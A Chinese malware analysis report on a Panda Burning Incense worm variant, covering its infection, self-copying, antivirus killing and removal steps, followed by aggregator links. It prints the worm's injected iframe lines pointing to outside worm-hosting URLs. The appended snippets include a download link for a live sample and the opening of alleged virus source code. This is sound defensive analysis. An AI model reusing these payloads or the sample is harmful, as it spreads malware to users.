熊猫烧香变种病毒分析分析报告

样本名 2_dump_SCY.exe(熊猫烧香)
作者 yusakul
时间 2018-07-13
平台 Win7-32

1.样本概况

1.1 样本信息

病毒名称 2_dump_SCY.exe
所属家族 熊猫烧香
样本名称 0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768
样本类型 PE
样本大小 98816 bytes
MD5值 b8f8e75c9e77743a61bbea9ccbcffd5d
SHA1值 188fc8fc580c0ea4bf8a8900a3d36471823c8923
CRC32 E63D45D3
SHA256 0c15096fb3bc30800f7af002c25953162b799391300a62b8507fe8e4f6532768
SSDeep 3072:apAja0pSLwYqK6hVZ7N4bdq4a53YKCOTpc:a2ja0pShqK65ZOq4QYK1m

1.2 病毒行为

设置注册表实现自启动
修改资源管理器(explorer)的文件夹的隐藏属性
将进程的内存属性修改为可执行或可写
想系统服务发送控制码
删除服务
对指定运行的进程感兴趣

1.2 测试环境及工具

工具 备注
VMware® Workstation 14 Pro 分析环境win7_x32
火绒剑 行为监控
IDA pro 7.0 静态分析
Ollydbg 动态分析

1.3 分析目标

1.3.1 查看PE文件

1. kernel32.dll文件导入函数

可以看出导入的这些函数都是进程、文件相关的API函数。

2. Advapi32.dll

Advapi32.dll是一个高级API应用程序接口。包括了函数与对象的安全性,注册表的操控以及事件日志相关的API函数。

这些函数主要包括三类:注册表相关函数,进程权限修改函数,服务相关函数。

3. Mpr.dll

Mpr.dll是windows操作系统网络通信相关模块。

Wsock.dll windows socket相关API接口。

WNetAddConnection2A创建一个网络资源的链接。

URLDownloadToFileA从指定的URL读取内容写入到文件中。

由上述的导入表分析可知,该病毒程序的主要功能包括:文件读写、注册表修改、进程权限修改,网络链接,URL等。

1.3.2 火绒剑监控 - 文件操作

1. 创建自我备份在根目录

2. 创建并释放隐藏文件Desktop_.ini

3. 自我复制

1.3.2火绒剑监控 - 注册表操作

1. 无效“显示所有文件和文件夹”功能

2. 删除杀毒软件自启项

3. 修改文件

使用notepad++查看被修改的文件,被新添加了一行:

<iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>

将该网址提交微步在线分析如下

1.3.3 火绒剑监控 - 网络操作

1. 扫描并尝试连接局域网脑内139、445端口

因为本次分析是在虚拟机封闭分析,所以没有连接其他主机,猜测此病毒连接成功后,会向其他主机发送自己,达到传播目的。

2. 尝试连接外网IP,并发送数据包

数据内容如下:

1.3.4火绒剑监控 - 进程操作

1. 遍历系统进程并启动自释放文件

2.具体行为分析

2.1 主要行为

2.1.1 恶意程序对用户造成的危害

1. 替换程序图标

2. 隐藏文件

3. 有目录创建Desktop_.ini文件,内容为当前时间(2018-7-11)。

  1. 大量用户软件被修改,无法正常运行

2.2 恶意代码分析

2.2.1 恶意代码树结构图

2.2.1 恶意代码IDA结构图

两次对比字符串是否相等,不相等则退出, 验证完成后有三个主要的恶意行为函数

2.2.2 主要功能函数sub_40819C – 复制

此函数主要功能为自我复制到系统目录并执行复制体。

1.查找系统目录下是否存在Desktop.ini文件,有则删除

2.检测病毒spc0lsv.exe

病毒会通过检查文件路径、病毒感染标志来确定进当前病毒属于以下三种情况的哪一种情况。

分别进程本身属于原始病毒文件、被感染的可执行文件、以及伪装目标进程三种情况。

(1)原始病毒文件

拷贝自身到
~/system32/driver/目录,重命名为spc0lsv.exe并运行,然后结束当前进程。

(2)当前程序时是被感染的可执行文件

1)在当前目录释放被感染的原始文件

2)删除系统目录下spo0lav

3)将创建病毒程序拷贝到系统目录,并执行。

(3)当前运行路径为系统根目录,说明当前是在伪装成系统程序状态下运行的,没有敏感操作。

2.2.3 主要功能函数sub_40D18C – 感染

此函数为感染传播函数。

该函数由3个主要函数,第一个执行感染功能,第二个实现自我复制,第三个局域网传播自身。

感染文件线程

(1)遍历文件夹,判断是否为文件夹,判断目录下是否存在Desktop_.ini文件。

判断是否存在Desktop_.ini

(2)若目录下存在Desktop_.ini,获取当前系统时间,对比Desktop_.ini中的时间,是同一天则表示此目录已被感染,跳过此目录。

若不同则在此目录下生成新的Desktop_.ini,写入本地时间。

(3)删除GHO备份

(4)感染PE文件 – 感染方式1

将病毒内容直接覆盖到要感染程序,感染目标文件后缀类型有:EXE、SCR、PIF、COM。

f_HackWay1:

(5)感染PE文件 – 感染方式2

网页感染:感染目标文件后缀类型有:htm, html, asp, php, jsp, aspx。

主要将字符串(<iframe src=http://www.krvkr.com/worm.htm width=0
height=0></iframe>)添加到文件末尾。

f_HackWays:

2. 自我复制 - 时钟周期6s

检索各个磁盘的根目录是否存在setup.exe和autorun.inf文件,存在则删除它们。

将自身复制到 盘符:\setup.exe

遍历磁盘, 创建“盘符:\autorun.inf”文件。

设置setup.exe文件属性为 <系统,隐藏>

设置autorun.inf文件属性为 <系统,隐藏>,同时将setup.exe设置为自启

3. 局域网传播

2.2.4 主要功能函数sub_40D088 – 其他

此函数主要功能为通过修改注册表实现自我保护,连接网站实现自我更新等功能。

该函数中设置了6个时钟周期,定时执行不同的功能。

TimerFunc_1(1s)

(1)提升进程权限

(2)遍历窗口名, 向指定窗口名发送QUIT消息, 并结束指定进程,大多为杀毒防护软件。

(3)扫描进程,如果有检测到以下进程则结束它,下图为部分截图:

(4)修改注册表,设置spo0lsv.exe开机启动,设置文件(夹)隐藏

TimerFunc_2(1200s)

通过URL地址更新

TimerFunc_3(10s)

(1)通过URL地址更新

(2)删除网络共享:net share ipc$ /del 删除ipc$共享

(3)关闭当前时钟

4. TimerFunc_4(6s)

将杀毒软件服务停止,并删除注册表启动项。

TimerFunc_5(10s)

字符串被加密操作过,根据特征猜测可能是网址,似乎是对一些网址做了操作。

TimerFunc_6(180s)

仍然是从某个网址上下载文件,应该不是关键操作。

3.解决方案

3.1 病毒行为

病毒行为1:病毒本身创建了名为“spo01sv.exe”的进程,该进程文件的路径为“C:\WINDOWS\system32\drivers\spo01sv.exe”。

病毒行为2:在注册表KCU\Software\Microsoft\Windows\CurrentVersio

n\Run”中创建“svcshare”,用于在开机时启动位于“C:\WINDOWS\system3

2\drivers\spo0lsv.exe”的病毒程序。

病毒行为3:修改注册表,使得隐藏文件无法通过普通的设置进行显示,该位置为HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Adva

nced\Folder\Hidden\SHOWALL,病毒将CheckedValue的键值设置为了0。

病毒行为4:将自身拷贝到根目录,并命名为“setup.exe”,同时创建“autorun.inf”用于病毒的启动,这两个文件的属性都是“隐藏”。

病毒行为5:在一些目录中创建名为“Desktop_.ini”的隐藏文件。

3.2 杀毒工具编写步骤

3.2.1 终止病毒进程

利用ToolHelpAPI获得快照句柄,而后再利用Process32First和Process32Next枚举当前的进程,枚举的过程当中获取结构体ProcessEntry32这个结构体里面的相关信息(包括进程名和进程ID);

找到目标进程之后,利用OpenProcess获取当前的进程句柄,最后再利用TerminateProcess终止病毒进程.

3.2.2. 删除文件

调用函数Bool DeleteFile (LPCTSTR
lpFilename),把lpFilename设为要指向删除的文件的文件名的指针即可,可以包含具体路径。

3.2.3 修复注册表,删除启动启动项

RegOpenKeyEx()打开目标主键,并返回句柄,然后利用RegSetValueEx进行修改键值,最后可以利用RegSetValueEx来删除键值,最后利用RegCloseKey来进行关闭。

3.2.3 查杀工具链接

我的GitHub·https://github.com/yusakul/PandaKiller

3.2.4 工具截图

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. TFS2010(Team Foundation Server)配置总结

    1、安装时未配置报表服务器,安装完成后点击TFS管理控制台的“报告”>>“编辑”。按照TFS的管理手册配置即可,“仓库”和“Analysis Services 数据库”都可以填SQL Server 2008里面没有的数据库(自动新建),报表服务器使用的 Web 服务的 URL 和报表管理器的 URL都可以自…...

    2024/4/18 21:57:02
  2. XP win7双系统安装及激活

    国庆假玩了一下XP与win7双系统安装,现分享一下经验: 1,先装XP-SP3, 同时硬盘分区为C/D/E/F/G/H,xp安装到了C盘 2,安装windows7,我用的ghost版本(DEEPIN_ghost_win7_Ultimate_x86_2010.iso)安装到最后的H盘,安装到最后的分区有个好处 3,把win7 ghost到H盘后,发现启动…...

    2024/4/30 17:48:11
  3. 基于PaddleHub开发一款学生口罩佩戴情况检测登记系统

    PaddleHub介绍 PaddleHub是由百度推出的国产深度学习框架——“飞桨” 预训练模型管理和迁移学习工具,通过PaddleHub开发者可以使用高质量的预训练模型结合Fine-tune API快速完成迁移学习到应用部署的全流程工作。其提供了飞桨生态下的高质量预训练模型,涵盖了图像分类、目标…...

    2024/4/22 2:36:37
  4. Mac下PHP7.3安装Swoole4.4扩展教程

    Mac系统下 PHP7安装Swoole扩展 教程今天我用的PHP版本是:PHP7.3.5Swoole下载地址:http://pecl.php.net/package/swoole下载后,tar -xzf swoole-4.4.0.tgzcd swoole-4.4.0phpize./configuremakemake testmake install 解释:phpize是用来扩展php扩展模块的通过phpize可以建立…...

    2024/4/14 21:33:56
  5. 嵌入式开源软件的十大弊端

    俗话说得好,“得来全不费功夫”,免费当然是个好事情了。既然是免费的, 开源的实时操作系统(RTOS)看起来是个不错的选择。 但是对于嵌入式设备和物联网设备的开发者来说, 有时并不愿轻易涉足, 比如家居自动化和可穿戴设备, 医疗仪器和工业控制系统。 在决定之前, 需要了解使用…...

    2024/4/14 21:33:58
  6. “熊猫烧香”病毒简介及特征

    “熊猫烧香”病毒简介及特征“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失…...

    2024/4/14 21:33:54
  7. PPM install failed:BDB::SQLite::db selectrow_arrry failed: database disk image is malformed解决方法

    PPM install failed:BDB::SQLite::db selectrow_arrry failed: database disk image is malformed或者ActivePerl自带的PPM打不开(无响应)解决办法 文章地址:https://blog.csdn.net/weixin_44943157/article/details/105970387 最近我在cmd命令行里面安装App-cpanmunis时,通…...

    2024/4/24 22:45:06
  8. 手握美团offer,结果背调红灯,哭了,网友:别小瞧背调公司

    相信很多人都会包装简历,尤其是工作经历,不过也有人会填一下虚假的背景信息,比如公司leader或HR,小公司没有实力过多进行背调,但是大企业就不同了,他们有方法了解到实际的情况。背调包括候选人以往的经历(包括工作时间、岗位名称、工作职责、教育经历、薪资水平)、他人的…...

    2024/4/24 22:45:09
  9. 熊猫烧香完整的病毒源代码

    program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432; //病毒体的大小IconOffset = $12EB8; //PE文件主图标的偏移量//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同//查找2800000020的十六进制字符串…...

    2024/4/24 22:45:04
  10. swoole入门教程05-Swoole的自定义协议功能的使用

    环境说明: 系统:Ubuntu14.04 (安装教程包括CentOS6.5) PHP版本:PHP-5.5.10 swoole版本:1.7.8-alpha1.为什么要提供自定义协议熟悉TCP通信的朋友都会知道,TCP是一个流式协议。客户端向服务器发送的一段数据,可能并不会被服务器一次就完整的收到;客户端向服务器发送的多段…...

    2024/4/24 22:45:10
  11. BDB 入门篇 第3章 DPL First Steps 直接持久层第一步

    第3章 Direct Persistence Layer First StepsDPL 是Direct Persistence Layer 的缩写,意思是:直接持久层,即:直接将对象持久化到数据库中内容目录Entity Stores (存储实体对象) Opening and Closing Environments and Stores (打开和关闭环境和存储对象) Persistent Ob…...

    2024/4/24 22:45:02
  12. Win7 Win2003 双系统重装2003以后修复Windows 7 系统启动项

    Win7 发布后,为了体验一下MS的新产品,特意在本本上装了双系统,之后突然发现Win2003 用得一点都不爽,仔细看才发现,原来所安装的Win2003是标准版。不得已,所以重装Win2003,但是考虑重装之后,Win7将无法启动,Google之后,终于在某个角落里找到了一个叫bcdautofix 强大程序…...

    2024/4/24 22:45:02
  13. Ubuntu与开源软件

    8月25日,在《开源中国 开源世界》高峰论坛上,宫敏博士指出:“自由软件与开源软件是同样一种东西”;同时,他指出:“如果开源软件这个术语不是指的这种含义,那么,就应该使用别的术语”。当即,在会议上就有人大胆附议。2005年2月,“开源软件”这个术语的创始人Bruce Per…...

    2024/4/24 22:45:03
  14. UnityStandardAsset工程、源码分析_2_赛车游戏[玩家控制]_车辆核心控制

    上一章地址:UnityStandardAsset工程、源码分析_1_赛车游戏[玩家控制]_输入系统 在上一章里,我们了解了整个车辆控制的大体流程,并且分析了一下输入系统,也就是从玩家的手柄\手机倾斜输入作用到车辆核心控制逻辑的过程中,调用了那些类,这些类又是怎样协同工作的。那么这章…...

    2024/4/24 22:44:59
  15. 开源软件的盈利模式

    开源软件在发展历程中,已经不仅仅是开放源代码的免费软件。开源软件与商业并不冲突,它是一种新兴的商业模式。与传统的商业软件相比,开源软件采用了开放源代码、免费分发等形式,减少了营销与销售成本,更易于广泛传播。在开源软件领域中,常见的盈利模式一共有7种。下面让我…...

    2024/4/24 22:45:01
  16. TFS2010安装教程

    下载地址:http://www.microsoft.com/zh-cn/download/details.aspx?id=20506安装教程:http://blog.sina.com.cn/s/blog_5972d8560100qjbn.html 使用教程:http://www.cnblogs.com/ewyb/archive/2010/09/27/1836458.htmlhttp://blog.163.com/gavin_it/blog/static/17681609920…...

    2024/4/24 22:45:04
  17. windows下引导双系统卸载Linux

    习惯性的,啰嗦几句。从第一篇虽简陋但对我很重要的博客里决定要写点什么,今天就来还债。(这里打算发个表情木有找到)。 开始先喷几句:这里diss一下CSDN里那些每天叽叽喳喳写文章的外行。尤其前几天看了一篇关于程序员30岁出路之类的博文,气得我恶狠狠的给他评论了一下,评…...

    2024/4/24 22:45:00
  18. [Swoole入门]-Ubuntu环境下安装Swoole扩展

    PHP是最好的语言这是毋庸置疑了,而且还有很多成熟有用的扩展辅助,使用起来那是一个爽。其中Swoole就是优秀的扩展之一。由于升级win10把我的farbox弄没了,在这里记下这一篇博客吧,自己记录心得的同时还能帮到别人,何乐而不为(* v *)。 【Swoole入门】一,安装Swoole 环境:…...

    2024/4/24 22:44:56
  19. 怎样预防熊猫烧香系列病毒?

    这篇文章被众多网站转载,看到自己写的东东能对网友有所帮助,心情真是很爽 最近那个熊猫烧香病毒让所有用电脑的人很生气,熊猫这个国宝似乎不再可爱,而成了人人喊打的过街老鼠。熊猫变种实在太多,中招后的损失很严重,杀毒软件一直在救火中。以下几招很简单易行,帮你预防熊…...

    2024/4/24 22:44:58
  20. 菜鸟之路---1,熊猫烧香病毒的简单分析

    病毒的网盘链接:https://pan.baidu.com/s/1dtMjiI 密码:l1ii(谨慎下载,免得感染了你的电脑)1.样本概况1.1 样本信息文件: spo0lsv.exe(熊猫烧香)大小: 30001 字节修改时间: 2007年1月17日, 12:18:40MD5:512301C535C88255C9A252FDF70B7A03SHA1: CA3A1070CFF311C0BA40AB6…...

    2024/4/24 22:44:53

最新文章

  1. go设计模式之组合设计模式

    组合设计模式 简介 将对象组合成树形结构以表示“部分-整体”的层次结构。组合设计模式使得用户对单个对象和组合对象的使用具有一致性。 参与者 Component 为组合中的对象声明接口 Leaf 在组合中表示叶子节点对象。 Composite 存储子部件。访问和管理子部件。 案例1 c…...

    2024/4/30 22:50:03
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 磁盘管理与文件管理

    文章目录 一、磁盘结构二、MBR与磁盘分区分区的优势与缺点分区的方式文件系统分区工具挂载与解挂载 一、磁盘结构 1.硬盘结构 硬盘分类&#xff1a; 1.机械硬盘&#xff1a;靠磁头转动找数据 慢 便宜 2.固态硬盘&#xff1a;靠芯片去找数据 快 贵 硬盘的数据结构&#xff1a;…...

    2024/4/29 19:39:50
  4. 前端 js 经典:字符编码详解

    前言&#xff1a;计算机只能识别二进制&#xff0c;开发语言中数据类型还有数字&#xff0c;字母&#xff0c;中文&#xff0c;特殊符号等&#xff0c;都需要转化成二进制编码才能让技术机识别。 一. 编码方式 ACSLL、Unicode、utf-8、URL 编码、base64 等。 1. ACSLL 对英语…...

    2024/4/29 3:52:58
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/4/29 23:16:47
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/4/30 18:14:14
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/29 2:29:43
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/4/30 18:21:48
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/27 17:58:04
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/27 14:22:49
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/28 1:28:33
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/30 9:43:09
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/27 17:59:30
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/4/25 18:39:16
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/28 1:34:08
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/26 19:03:37
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/29 20:46:55
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/30 22:21:04
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/4/26 23:04:58
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/4/27 23:24:42
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/28 5:48:52
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/30 9:42:22
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/4/30 9:43:22
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/30 9:42:49
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

